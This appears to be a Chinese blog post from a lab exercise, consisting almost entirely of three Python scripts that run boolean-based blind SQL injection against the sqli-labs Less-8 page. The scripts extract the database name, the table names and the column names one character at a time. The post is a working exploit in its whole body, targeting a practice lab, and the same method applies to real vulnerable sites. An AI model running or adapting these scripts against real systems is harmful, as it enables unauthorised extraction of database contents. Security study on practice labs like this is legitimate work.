获取当前数据库名
import requests
def inject_database(url):
name=''
max_length=20
low={'a': 97, 'z': 122, 'A': 65, 'Z': 90, '0': 48, '9': 57, '_': 95}
high={97: 'a', 122: 'z', 65: 'A', 90: 'Z', 48: '0', 57: '9', 95: '_'}
for i in range(1, max_length + 1):
low_val=32
high_val=122
while low_val < high_val:
middle_val=(low_val + high_val) // 2
payload=f"1' AND ASCII(SUBSTRING(DATABASE(),{i},1))>{middle_val}-- "
params={"id": payload}
r=requests.get(url, params=params)
if 'You are in' in r.text:
low_val=middle_val + 1
else:
high_val=middle_val
if low_val > 32:
char=chr(low_val)
name+=char
print(f"Current database name: {name}")
low_val=32
high_val=122
print(f"Final database name: {name}")
if __name__ == "__main__":
url="http://sqli-labs:8013/Less-8/"
inject_database(url)结果
获取数据库表
import requests
def inject_table_names(url, database_name):
table_names=[]
max_length=20
allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95] # 0-9, A-Z, a-z, _
num_tables=100
for table_index in range(num_tables):
table_name=''
for i in range(1, max_length + 1):
low=min(allowed_chars)
high=max(allowed_chars)
middle=(low + high) // 2
while low < high:
payload=f"1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{database_name}' LIMIT {table_index},1),{i},1))>{middle}-- "
params={"id": payload}
r=requests.get(url, params=params)
if 'You are in' in r.text:
low=middle + 1
else:
high=middle
middle=(low + high) // 2
if middle in allowed_chars:
table_name+=chr(middle)
print(f"Current table name: {table_name}")
low=min(allowed_chars)
high=max(allowed_chars)
middle=(low + high) // 2
if table_name:
table_names.append(table_name)
if len(table_names) >= 5:
break
print(f"Final table names: {table_names}")
if __name__ == "__main__":
url="http://sqli-labs:8013/Less-8/"
database_name="security" # 目标数据库名称
inject_table_names(url, database_name)结果
获取表的列
import requests
def inject_column_names(url, database_name, table_name):
column_names=[]
max_length=20
allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95] # 0-9, A-Z, a-z, _
num_columns=100
for column_index in range(num_columns):
column_name=''
for i in range(1, max_length + 1):
low=min(allowed_chars)
high=max(allowed_chars)
middle=(low + high) // 2
while low < high:
payload=f"1' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{database_name}' AND table_name='{table_name}' LIMIT {column_index},1),{i},1))>{middle}-- "
params={"id": payload}
r=requests.get(url, params=params)
if 'You are in' in r.text:
low=middle + 1
else:
high=middle
middle=(low + high) // 2
if middle in allowed_chars:
column_name+=chr(middle)
print(f"Current column name: {column_name}")
low=min(allowed_chars)
high=max(allowed_chars)
middle=(low + high) // 2
if column_name and not column_name.startswith("0"):
column_names.append(column_name)
if len(column_names) >= 5:
break
print(f"Final column names: {column_names}")
if __name__ == "__main__":
url="http://sqli-labs:8013/Less-8/"
database_name="security"
table_name="users"
inject_column_names(url, database_name, table_name)结果
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
